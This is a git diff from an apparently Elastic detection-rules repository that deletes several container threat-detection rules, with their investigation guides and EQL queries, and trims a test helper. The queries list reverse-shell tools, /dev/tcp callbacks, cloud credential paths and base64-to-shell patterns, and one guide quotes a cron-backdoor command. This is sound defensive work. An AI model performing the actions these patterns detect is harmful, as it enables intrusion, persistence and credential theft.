or allow interactive access. -- Determine how the interactive session was initiated and by whom by correlating with Kubernetes events and audit logs for exec/attach/ephemeral-container activity and runtime logs for TTY sessions, including the initiating principal and source IP. -- Correlate with API server audit logs to retrieve the exact requests (verbs, resources, namespaces), the authenticated subject (service account or user), and response codes to identify any successful access to sensitive resources like Secrets or workload-modifying actions. -- Inspect the pod for credential use and operator traces by checking recent process activity, shell history, environment variables, and access to service account token or kubeconfig files at expected mount paths. -- Assess scope and potential persistence by listing recent cluster objects created or modified by the same identity across namespaces (Pods, CronJobs, RoleBindings, Secrets) within the timeframe around the alert. - -### False positive analysis - -- An administrator used kubectl interactively within a maintenance container to run get/list/patch commands during routine operations such as inspecting pods or updating labels, which matches expected administrative behavior. -- A developer ran openssl s_client, socat with SSL, or ncat --ssl interactively from within the container to troubleshoot TLS connectivity to a service endpoint, not the Kubernetes API server, causing the rule to fire despite benign intent. - -### Response and remediation - -- Immediately delete the affected pod to terminate interactive access, and apply a temporary NetworkPolicy in its namespace that blocks egress to the default/kubernetes service (API server) while you patch its ServiceAccount to set automountServiceAccountToken: false. -- Use API server audit logs and kubectl to enumerate actions taken by the pod’s ServiceAccount and revert any unauthorized objects it created or modified (Pods, CronJobs, RoleBindings, Secrets), and remove any attached ephemeral containers across the namespace. -- Rotate credentials and restore workloads by deleting any legacy ServiceAccount token Secret, restarting pods to issue new bound tokens, rebuilding the image from a trusted base, and redeploying with read-only rootfs and minimal RBAC verified via kubectl auth can-i. -- Escalate to incident response if audit logs show Secrets access or create/patch/update on workloads, if the ServiceAccount holds cluster-admin, or if the observed commands used curl -k/--insecure, wget --no-check-certificate, or openssl/socat/ncat with SSL to the API server. -- Harden the cluster by enforcing admission controls that deny kubectl exec/attach for non-admins, requiring automountServiceAccountToken: false by default and short-lived bound tokens where needed, restricting NetworkPolicies so only designated controllers can reach the API server, and adopting distroless images that omit curl/wget/openssl/ncat. -""" -risk_score = 21 -rule_id = "26a989d2-010e-4dae-b46b-689d03cc22b3" -severity = "low" -tags = ["Tactic: Discovery", "Tactic: Lateral Movement", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] -timestamp_override = "event.ingested" -type = "eql" -query = ''' -process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and ( - ( - process.name == "curl" and - process.args in ("-H", "--header") and - process.args like "*Authorization: Bearer *" and - ( - /* CA-specified */ - process.args in ("--cacert", "--capath") or - /* insecure */ - process.args in ("-k", "--insecure") - ) - ) or - ( - process.name == "wget" and - process.args like "--header*" and - process.args like "*Authorization: Bearer *" and - ( - /* CA-specified */ - process.args == "--ca-certificate" or - /* insecure */ - process.args == "--no-check-certificate" - ) - ) or - ( - /* Account for tools that execute utilities as a subprocess, in this case the target utility name will appear as a process arg */ - process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "busybox") and - process.args in ("wget", "/bin/wget", "/usr/bin/wget", "/usr/local/bin/wget") and - process.args like "--header*" and - process.args like "*Authorization: Bearer*" and - process.args == "--no-check-certificate" - ) or - ( - /* ssl_client is busybox-specific, so we need to handle it separately */ - process.name == "busybox" and - process.args == "ssl_client" and - process.args like "*Authorization: Bearer*" - ) or - (process.name == "openssl" and process.args == "s_client" and process.args == "-connect") or - (process.name == "socat" and process.args like~ "*ssl*") or - (process.name == "ncat" and process.args like "--ssl*") or - (process.name == "kubectl" and process.args in ("get", "list", "watch", "create", "patch", "update")) -) and -process.interactive == true and container.id like "*" -''' - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1613" -name = "Container and Resource Discovery" -reference = "https://attack.mitre.org/techniques/T1613/" - -[rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1550" -name = "Use Alternate Authentication Material" -reference = "https://attack.mitre.org/techniques/T1550/" - -[[rule.threat.technique.subtechnique]] -id = "T1550.001" -name = "Application Access Token" -reference = "https://attack.mitre.org/techniques/T1550/001/" - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/integrations/cloud_defend/execution_suspicious_echo_or_printf_execution.toml b/rules/integrations/cloud_defend/execution_suspicious_echo_or_printf_execution.toml deleted file mode 100644 index c6a0847d380..00000000000 --- a/rules/integrations/cloud_defend/execution_suspicious_echo_or_printf_execution.toml +++ /dev/null @@ -1,174 +0,0 @@ -[metadata] -creation_date = "2026/02/10" -integration = ["cloud_defend"] -maturity = "production" -min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" -min_stack_version = "9.3.0" -updated_date = "2026/03/23" - -[rule] -author = ["Elastic"] -description = """ -This rule detects the execution of the echo/printf command to write data to potential persistence files, decode base64/32/16 and -hex content or establish connections to a potential C2. The echo/printf commands are used to display a line of text or write data -to a file. Threat actors may abuse the echo/printf commands to write data to files or file descriptors that are executed (by -other processes or services) to establish persistence or escalate privileges. -""" -from = "now-6m" -index = ["logs-cloud_defend.process*"] -interval = "5m" -language = "eql" -license = "Elastic License v2" -name = "Suspicious Echo or Printf Execution Detected via Defend for Containers" -note = """## Triage and analysis - -> **Disclaimer**: -> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. - -### Investigating Suspicious Echo or Printf Execution Detected via Defend for Containers - -This rule flags interactive shell commands that invoke echo or printf with patterns used to write or stage data into sensitive paths, decode encoded payloads, or reach out via /dev/tcp. Attackers use these lightweight built-ins to avoid dropping tools while creating persistence or privilege escalation by modifying cron, rc.local, sudoers, ld.so preload, or SSH authorized_keys. In a container, a common pattern is execing into a pod and running `sh -c 'printf | base64 -d > /etc/cron.d/job; chmod +x …'` to implant a scheduled backdoor. - -### Possible investigation steps - -- Review the full command line, parent/child process tree, and session metadata to determine who initiated the interactive exec and whether it was an expected administrative action. -- Extract any encoded strings or redirected output from the command and safely decode/pretty-print it to identify dropped scripts, keys, cron entries, or additional staging commands. -- Inspect the referenced destination paths (and their symlink targets) for recent modifications, unexpected permissions/ownership changes, and persistence artifacts such as cron jobs, rc.local edits, ld.so preload configs, sudoers changes, or SSH authorized_keys additions. -- Determine whether the write target resides on a mounted volume shared with the host or other pods, and assess blast radius by checking for the same artifact across replicas/namespaces and CI/CD deployment history. -- Correlate around the execution time for follow-on activity such as outbound connections (including /dev/tcp usage), subsequent interpreter launches, or cleanup actions, and contain by isolating/pausing the workload if malicious behavior is confirmed. - -### False positive analysis - -- An administrator interactively execs into a container during troubleshooting and uses `echo`/`printf` with redirection (and possibly `chmod`) to make a temporary or emergency change in paths like `/etc/profile`, `/etc/update-motd.d`, `/etc/ssh*`, or `~/.ssh/*` to restore access or correct misconfiguration. -- A developer interactively execs into a container to create and run a short diagnostic artifact by using `echo`/`printf` to write into `/tmp` or `/dev/shm`, decode embedded `base64`/hex content, or validate network reachability via `/dev/tcp`, which can resemble staging/persistence behavior. - -### Response and remediation - -- Isolate the affected pod/container by removing it from service (scale to zero or cordon/deny ingress-egress) and, if needed, pause it to preserve the filesystem state before it can overwrite or delete staged artifacts. -- Capture and preserve evidence by exporting the full shell command string and taking a filesystem snapshot/copy of any touched paths such as `/etc/cron*`, `/etc/rc.local`, `/etc/init.d`, `/etc/ld.so*`, `/etc/sudoers*`, and `~/.ssh/authorized_keys`, plus any files created in `/tmp`, `/var/tmp`, or `/dev/shm`. -- Eradicate persistence by removing unauthorized cron entries, rc.local/init scripts, sudoers/ld.so preload modifications, and injected SSH keys, then rotate any exposed credentials and redeploy the workload from a known-good image rather than “cleaning” the live container. -- Recover safely by rebuilding the image with patched dependencies, rolling out a fresh deployment, and validating that no replicas or shared volumes contain the same dropped scripts/keys or modified configuration files. -- Escalate immediately to incident response if the command decodes payloads (base64/base32/hex), writes into system startup/auth paths, invokes an interpreter via a pipe (e.g., `| sh/python/perl/php`), or uses `/dev/tcp` for outbound connectivity, as these indicate active staging or C2 behavior. -- Harden against recurrence by restricting interactive exec access, enforcing read-only root filesystems and least-privilege mounts, blocking writes to sensitive paths via policy, and adding egress controls to prevent `/dev/tcp`-style callbacks.""" -references = [ - "https://flare.io/learn/resources/blog/teampcp-cloud-native-ransomware", -] -risk_score = 73 -rule_id = "d9bfa475-270d-4b07-93cb-b1f49abe13da" -severity = "high" -tags = ["Tactic: Command and Control", "Tactic: Defense Evasion", "Tactic: Execution", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] -timestamp_override = "event.ingested" -type = "eql" -query = ''' -process where event.type == "start" and event.action == "exec" and process.interactive == true and -process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and -process.args in ("-lc", "-c", "-cl") and process.args like ("*echo *", "*printf *") and -process.args like ( - "*/etc/cron*", "*/etc/rc.local*", "*/dev/tcp/*", "*/etc/init.d*", "*/etc/update-motd.d*", - "*/etc/ld.so*", "*/etc/sudoers*", "*base64 *", "*base32 *", "*base16 *", "*/etc/profile*", - "*/dev/shm/*", "*/etc/ssh*", "*/home/*/.ssh/*", "*/root/.ssh*" , "*~/.ssh/*", "*xxd *", - "*/etc/shadow*", "* /tmp/*", "* /var/tmp/*", "* /dev/shm/* ", "* ~/*", "* /home/*", - "* /run/*", "* /var/run/*", "*|*sh", "*|*python*", "*|*php*", "*|*perl*", "*|*busybox*", - "*/var/www/*", "*>*", "*;*", "*chmod *", "*rm *", "*openssl enc*" -) and container.id like "?*" -''' - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1095" -name = "Non-Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1095/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1140" -name = "Deobfuscate/Decode Files or Information" -reference = "https://attack.mitre.org/techniques/T1140/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1037" -name = "Boot or Logon Initialization Scripts" -reference = "https://attack.mitre.org/techniques/T1037/" - -[[rule.threat.technique.subtechnique]] -id = "T1037.004" -name = "RC Scripts" -reference = "https://attack.mitre.org/techniques/T1037/004/" - -[[rule.threat.technique]] -id = "T1053" -name = "Scheduled Task/Job" -reference = "https://attack.mitre.org/techniques/T1053/" - -[[rule.threat.technique.subtechnique]] -id = "T1053.003" -name = "Cron" -reference = "https://attack.mitre.org/techniques/T1053/003/" - -[[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" - -[[rule.threat.technique.subtechnique]] -id = "T1546.004" -name = "Unix Shell Configuration Modification" -reference = "https://attack.mitre.org/techniques/T1546/004/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" - -[[rule.threat.technique.subtechnique]] -id = "T1548.003" -name = "Sudo and Sudo Caching" -reference = "https://attack.mitre.org/techniques/T1548/003/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/cloud_defend/execution_suspicious_webserver_child_process_execution.toml b/rules/integrations/cloud_defend/execution_suspicious_webserver_child_process_execution.toml deleted file mode 100644 index 03a60c061c0..00000000000 --- a/rules/integrations/cloud_defend/execution_suspicious_webserver_child_process_execution.toml +++ /dev/null @@ -1,275 +0,0 @@ -[metadata] -creation_date = "2026/02/06" -integration = ["cloud_defend"] -maturity = "production" -min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" -min_stack_version = "9.3.0" -updated_date = "2026/03/23" - -[rule] -author = ["Elastic"] -description = """ -This rule detects the exploitation of a web server through the execution of a suspicious process by common web server -user accounts. Attackers may upload a web shell to a web server to maintain access to the system. -""" -from = "now-6m" -index = ["logs-cloud_defend.process*"] -interval = "5m" -language = "eql" -license = "Elastic License v2" -name = "Web Server Exploitation Detected via Defend for Containers" -note = """## Triage and analysis - -> **Disclaimer**: -> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. - -### Investigating Web Server Exploitation Detected via Defend for Containers - -This rule flags Linux container activity where a web server (or typical web-service account) executes a suspicious process, a strong indicator of web app exploitation rather than normal request handling. It matters because this pattern commonly marks initial foothold and post-exploitation execution that can lead to persistence and lateral movement from the service container. A typical attacker flow drops a web shell or abuses RCE to launch `sh -c` and pull or run a secondary payload (e.g., reverse shell). - -### Possible investigation steps - -- Capture the full executed command line and decode/normalize any obfuscation (base64, hex, URL encoding) to determine the operator intent and any payload retrieval or reverse-shell behavior. -- Correlate the execution timestamp with web access/error logs and ingress/WAF events to identify the triggering request path, parameters, and source IP/user-agent indicating RCE or web-shell invocation. -- Inspect recent file and permission changes in the container’s application and web directories (including temp and upload paths) to identify newly dropped scripts/binaries, cron entries, or modified server configs. -- Review container and orchestration context (image tag/digest, recent deploys, exec sessions, and Kubernetes events) to determine whether the activity aligns with a legitimate rollout or represents in-container compromise. -- Check network telemetry for the container around the event for suspicious outbound connections, DNS lookups, or downloads, then pivot to any contacted hosts to assess command-and-control or staging infrastructure. - -### False positive analysis - -- A web application or server-side script running under the web-service account legitimately invokes `sh -c` (e.g., to run maintenance tasks like log rotation, cache rebuilds, file conversions, or templating/asset compilation) from a web directory such as `/var/www/*`, causing the web server to spawn a shell child process. -- During container startup or a deployment/health-check routine, the web server process launches a shell via `sh -c` to perform initialization (e.g., environment substitution, dynamic configuration generation, permission fixes, or calling bundled helper scripts), which can resemble exploitation when the parent is a web server and the child is a shell. - -### Response and remediation - -- Immediately isolate the affected container/pod from inbound and outbound traffic (quarantine namespace/security group or apply a deny-all NetworkPolicy) and stop the workload to prevent further `sh -c` execution and potential C2. -- Preserve evidence by exporting the container filesystem and logs (web access/error logs, application logs, and process output) and capture the exact shell command string and any downloaded payloads or newly created files in web roots, temp, and upload directories. -- Eradicate by removing any identified web shells/backdoors and reverting unauthorized changes, then rebuild and redeploy the service from a known-good image digest while rotating secrets exposed to the container (service tokens, database creds, API keys). -- Recover by validating application integrity and behavior post-redeploy (no unexpected shell spawns, no abnormal outbound connections, clean health checks) and monitor the previously contacted IPs/domains for further callbacks from other workloads. -- Escalate to incident response and platform security immediately if the shell command indicates payload retrieval, reverse shell activity, credential access, or if similar `sh -c` executions are observed across multiple containers/namespaces. -- Harden by removing shell binaries from runtime images where feasible, enforcing non-root and read-only filesystems, restricting egress to required destinations only, disabling risky interpreter execution paths in the web app, and adding WAF/RCE protections for the identified vulnerable endpoint.""" -risk_score = 73 -rule_id = "497a7091-0ebd-44d7-88c4-367ab4d4d852" -severity = "high" -tags = ["Tactic: Execution", "Tactic: Initial Access", "Tactic: Persistence", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] -timestamp_override = "event.ingested" -type = "eql" -query = ''' -process where event.type == "start" and event.action == "exec" and process.parent.interactive == false and -container.id like "?*" and ( - process.parent.name in ( - "nginx", "apache2", "httpd", "caddy", "mongrel_rails", "uwsgi", "daphne", "httpd.worker", "flask", - "php-cgi", "php-fcgi", "php-cgi.cagefs", "lswsctrl", "varnishd", "uvicorn", "waitress-serve", "starman" - ) or - process.parent.name like ("php-fpm*", "gunicorn*", "*.cgi", "*.fcgi") or - (process.parent.name like "ruby*" and process.parent.args like~ ("*puma*", "*rails*", "*passenger*")) or - (process.parent.name like "python*" and process.parent.args like~ ( - "*hypercorn*", "*flask*", "*uvicorn*", "*django*", "*app.py*", "*server.py*", "*wsgi.py*", "*asgi.py*" - )) or - (process.parent.name like "perl*" and process.parent.args like~ "*plackup*") or - (process.parent.name == "node" and process.parent.args like~ ( - "*next start*", "*--port*", "*PORT=*", "*HOST=*", "*0.0.0.0*", "*/dist/*.js*", "*/build/*.js*", "*/server/*.js*", - "*/app/*.js*","*/apps/*/*.js*", "*/index.js*", "*/main.js*", "*/srv/*", "*/opt/*", "*/var/www/*" - ) and - not process.parent.args like ("/opt/cursor-agent/*", "/home/*/*", "/root/*", "/opt/vscode-server/*", "/usr/lib/node_modules/openclaw/dist/index.js") - ) or - (process.parent.name == "java" and process.parent.args like~ ( - /* Tomcat */ - "org.apache.catalina.startup.Bootstrap", "-Dcatalina.base=*", - - /* Jetty */ - "org.eclipse.jetty.start.Main", "-Djetty.home=*", - - /* WildFly / JBoss */ - "org.jboss.modules.Main", "-Djboss.home.dir=*", - - /* WebLogic */ - "weblogic.Server", "-Dweblogic.Name=*", "*weblogic-launcher.jar*", - - /* WebSphere traditional + Liberty */ - "com.ibm.ws.runtime.WsServer", "com.ibm.ws.kernel.boot.cmdline.Bootstrap", - - /* GlassFish */ - "com.sun.enterprise.glassfish.bootstrap.ASMain", - - /* Resin */ - "com.caucho.server.resin.Resin", - - /* Spring Boot */ - "org.springframework.boot.loader.*", - - /* Quarkus */ - "*quarkus-run.jar*", "io.quarkus.runner.GeneratedMain", - - /* Micronaut */ - "io.micronaut.runtime.Micronaut", - - /* Dropwizard */ - "io.dropwizard.cli.ServerCommand", - - /* Play */ - "play.core.server.ProdServerStart", - - /* Helidon */ - "io.helidon.microprofile.server.Main", "io.helidon.webserver*", - - /* Vert.x */ - "io.vertx.core.Launcher", - - /* Keycloak */ - "org.keycloak*", - - /* Apereo CAS */ - "org.apereo.cas*", - - /* Elasticsearch */ - "org.elasticsearch.bootstrap.Elasticsearch", - - /* Atlassian / Gerrit */ - "com.atlassian.jira.startup.Launcher", "*BitbucketServerLauncher*", "com.google.gerrit.pgm.Daemon", - - /* Solr */ - "*-Dsolr.solr.home=*" - ) - ) -) and -process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "busybox") and -process.args in ("-c", "-cl", "-lc") and ( - process.args like ( - /* Suspicious Paths */ - "* /tmp/* ", "* /var/tmp/* ", "* /dev/shm/*", "* /var/www/*", "* /run/*", "* /var/run/*", - - /* Interpreter Execution */ - "*python* -c*", "*php* -r*", "*perl* -e*", "*ruby* -e*", "*lua* -e*", "*node * -e *", - - /* Encoding / Decoding */ - "*base64 -*d*", "*|*base64 *", "*xxd *", "*openssl*enc * -d *", - - /* Reverse Shells */ - "*netcat *", "* nc *", "*ncat *", "*/dev/tcp*", "*/dev/udp/*", " *socat *", "*openssl*s_client *", "*stty*raw*-echo*", - - /* File Access */ - "*>*/etc/cron*", "*/etc/ssh*", "*/home/*/.ssh/*", "*/root/.ssh*", "*~/.ssh/*", "*/etc/shadow*", "*/etc/passwd*", "*chpasswd*", - - /* AWS Credentials */ - "*aws_access_key_id*", "*aws_secret_access_key*", "*aws_session_token*", "*accesskeyid*", "*secretaccesskey*", - "*access_key*", "*.aws/credentials*", "*/.aws/config*", - - /* Azure Credentials */ - "*AZURE_CLIENT_ID*", "*AZURE_TENANT_ID*", "*AZURE_CLIENT_SECRET*", "*AZURE_FEDERATED_TOKEN_FILE*", - "*IDENTITY_ENDPOINT*", "*IDENTITY_HEADER*", "*MSI_ENDPOINT*", "*MSI_SECRET*", "*/.azure/*", - "*/run/secrets/azure/*", - - /* GCP Credentials */ - "*/.config/gcloud/*", "*application_default_credentials.json*", "*type: service_account*", - "*client_email*", "*private_key_id*", "*private_key*", "*/run/secrets/google/*", "*GOOGLE_APPLICATION_CREDENTIALS*", - - /* Misc. Cloud */ - "*/.docker/config.json*", "*/.npmrc*", "*/secrets/kubernetes.io/serviceaccount/*", - - /* Helpers */ - "*nohup*", "*setsid *", "*timeout *sh -c *", "*disown*", "*env *sh *-c*", - - /* Miscellaneous */ - "*echo *", "*chattr *", "*busybox *", "*#!*", "*chmod +x *", "*chmod 777*", - - /* Decompression */ - "*gzip -*d *", "*bzip2 -*d *", "*xz -*d *", "*tar -*x*", - - /* Path Traversal */ - "*../../../*etc/*", "*/.../*", "*../../../*home/*/*", "*../../../*root/*", - - "*|*sh", "*|*python*", "*|*php*", "*|*perl*", "*|*ruby*", "*|*node*", "*|*lua*", "*|*busybox*" - ) or - ( - process.args like ("*wget *", "*curl *") and ( - ( - process.args like~ ("* -o *", "* --output*", "* -o- *") and - process.args regex ".*[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}.*" - ) or - ( - process.args like ("*http://*", "*https://*") and - process.args like ( - "* /tmp/*", "* /var/tmp/*", "* /dev/shm/* ", "* /var/www/*", "* ~/*", - "* /home/*", "* /run/*", "* /var/run/*" - ) - ) - ) - ) -) and -not ( - (process.parent.name == "nginx" and process.args like ("chmod 777 /etc/resty-*", "resty*")) or - (process.parent.name == "apache2" and ( - process.args in ( - "/usr/local/bin/php -r 'echo phpversion();'", - "/usr/local/bin/php -r 'echo phpversion();'", - "/usr/bin/php -r 'echo phpversion();'" - ) or - process.args like """bash -c "( /home/*/apps/richdocumentscode/collabora/Collabora_Online.AppImage*""" - ) - ) or - (process.parent.name like "php-fpm*" and process.args in ( - "/usr/bin/php -r 'echo phpversion();'", - "/usr/bin/php -r 'echo phpversion();'", - "php -r 'print_r(phpversion());'", - "chattr -i -a /usr/local/virtualizor/license2.php" - ) - ) or - (process.parent.name == "php-cgi" and process.args like ( - "nohup php /home/*/public_html/lockindex.php index.php >/dev/null 2>&1 &", - "nohup php /home/*/public_html/wp-content/* >> /dev/null 2>&1 &", - "nohup php /home/*/public_html/wp-includes/* >> /dev/null 2>&1 &", - "nohup php /home/*/public_html/*/wp-content/* >> /dev/null 2>&1 &" - ) - ) -) -''' - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1505" -name = "Server Software Component" -reference = "https://attack.mitre.org/techniques/T1505/" - -[[rule.threat.technique.subtechnique]] -id = "T1505.003" -name = "Web Shell" -reference = "https://attack.mitre.org/techniques/T1505/003/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/cloud_defend/lateral_movement_potential_direct_kubelet_access_via_process_args.toml b/rules/integrations/cloud_defend/lateral_movement_potential_direct_kubelet_access_via_process_args.toml deleted file mode 100644 index 291fd00fe82..00000000000 --- a/rules/integrations/cloud_defend/lateral_movement_potential_direct_kubelet_access_via_process_args.toml +++ /dev/null @@ -1,94 +0,0 @@ -[metadata] -creation_date = "2026/02/02" -integration = ["cloud_defend"] -maturity = "production" -min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" -min_stack_version = "9.3.0" -updated_date = "2026/03/23" - -[rule] -author = ["Elastic"] -description = """ -This rule detects potential direct Kubelet access via process arguments. An adversary may need to access the -Kubelet API to gain access to the Kubernetes API server or other resources within the cluster. These requests -are often used to enumerate or execute commands on the Kubernetes API server or other resources within the -cluster, and may indicate an attempt to move laterally within the cluster. -""" -from = "now-6m" -index = ["logs-cloud_defend.process*"] -interval = "5m" -language = "eql" -license = "Elastic License v2" -name = "Potential Direct Kubelet Access via Process Arguments Detected via Defend for Containers" -note = """ ## Triage and analysis - -> **Disclaimer**: -> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. - -### Investigating Potential Direct Kubelet Access via Process Arguments Detected via Defend for Containers - -This detection flags an interactive process started inside a Linux container that includes an HTTP request targeting the Kubelet API on port 10250, a common pivot point for gaining execution and visibility across nodes. Attackers use direct Kubelet access to enumerate pods, fetch logs, or run commands that can lead to broader cluster access and lateral movement. A typical pattern is invoking curl or wget from a container shell against `https://:10250/` endpoints to probe or execute actions. - -### Possible investigation steps - -- Identify the originating pod/workload and container image for the interactive session, then determine whether the container was expected to provide diagnostic tooling or shell access and whether it recently changed. -- Extract the full command line and reconstruct the requested Kubelet endpoint path (for example `/pods`, `/exec`, `/run`, `/logs`) to infer intent (enumeration vs remote execution) and capture any embedded tokens or client cert usage. -- Correlate the process start time with Kubernetes audit logs and API server events to see if there were concurrent pod exec/attach, secret reads, or workload modifications suggesting follow-on activity. -- Verify whether the destination node IP/hostname is the local node or a remote node and review network flow logs/egress policies to confirm the container could reach port 10250 and whether other nodes were contacted. -- Check node and Kubelet configuration for exposure and auth bypass risk (anonymous auth, webhook mode, client certs), and inspect Kubelet logs around the timestamp for the corresponding request and response status codes. - -### False positive analysis - -- A cluster operator or SRE opens an interactive shell in a troubleshooting container and manually curls `https://:10250/` (or `/pods`/`/metrics`) to validate Kubelet reachability, authentication behavior, or node health during incident triage. -- A legitimate in-container diagnostic workflow uses an interactive session to probe the local node’s Kubelet port 10250 for environment verification (e.g., confirming node IP mapping or TLS/cert configuration), embedding the URL in process arguments without any intent to enumerate or execute actions across the cluster. - -### Response and remediation - -- Isolate the affected pod by removing service exposure and applying a temporary egress deny rule to block traffic to node port 10250 from that namespace/pod label, then terminate the interactive shell session and restart the workload from a known-good image. -- Capture and preserve the full command line, container filesystem changes, and relevant Kubelet and Kubernetes audit log entries around the timestamp, then hunt for additional in-cluster attempts to reach `https://:10250/` from other pods or namespaces. -- Rotate any credentials that may have been exposed or used (service account tokens, client certificates, kubeconfig files) and revoke or redeploy affected service accounts, then validate no unauthorized `exec/attach`, secret reads, or workload changes occurred after the access attempt. -- Escalate to the platform security/on-call incident commander immediately if the Kubelet request targeted sensitive endpoints like `/exec`, `/run`, `/containerLogs`, or returned successful responses (2xx/3xx) or if similar commands are seen across multiple nodes. -- Harden by enforcing Kubelet authentication/authorization (disable anonymous access, require webhook authz, restrict client cert issuance), and implement network controls that prevent pods from reaching node Kubelet ports except from approved node-local agents. -- Reduce recurrence by removing shell and HTTP tooling from application images, limiting interactive access (disable `kubectl exec` for non-admins), and tightening RBAC and admission policies to block privileged pods/host networking that increase node API reachability. -""" -references = [ - "https://heilancoos.github.io/research/2025/12/16/kubernetes.html#kubelet-api", - "https://www.cyberark.com/resources/threat-research-blog/using-kubelet-client-to-attack-the-kubernetes-cluster", - "https://www.aquasec.com/blog/kubernetes-exposed-exploiting-the-kubelet-api/" -] -risk_score = 47 -rule_id = "b4bd186b-69c6-45ad-8bef-5c35bbadeaef" -severity = "medium" -tags = ["Tactic: Discovery", "Tactic: Lateral Movement", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] -timestamp_override = "event.ingested" -type = "eql" -query = ''' -process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and -process.args like "http*:10250*" and process.interactive == true and container.id like "?*" -''' - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1613" -name = "Container and Resource Discovery" -reference = "https://attack.mitre.org/techniques/T1613/" - -[rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/tests/test_all_rules.py b/tests/test_all_rules.py index 2aef99982dc..584b6fba1cf 100644 --- a/tests/test_all_rules.py +++ b/tests/test_all_rules.py @@ -11,7 +11,6 @@ import uuid from collections import defaultdict from pathlib import Path -from typing import Any import eql import kql @@ -44,39 +43,6 @@ PACKAGE_STACK_VERSION = Version.parse(current_stack_version(), optional_minor_and_patch=True) -def _flat_threat_tactic_names(threat: list[Any]) -> list[str]: - """Tactic display names from ``rule.threat`` in encounter order (may repeat).""" - names: list[str] = [] - for entry in threat: - tactic = getattr(entry, "tactic", None) - if tactic is None: - continue - raw = getattr(tactic, "name", None) - if raw: - names.append(str(raw)) - return names - - -def _mitre_tactic_tag_gaps( - rule_tags: list[str], - threat_tactic_names: list[str], - attack_tactics_set: set[str], - *, - prefix: str = "Tactic: ", -) -> tuple[list[str], list[str]]: - """``(missing Tactic tags, orphan MITRE tactic names on 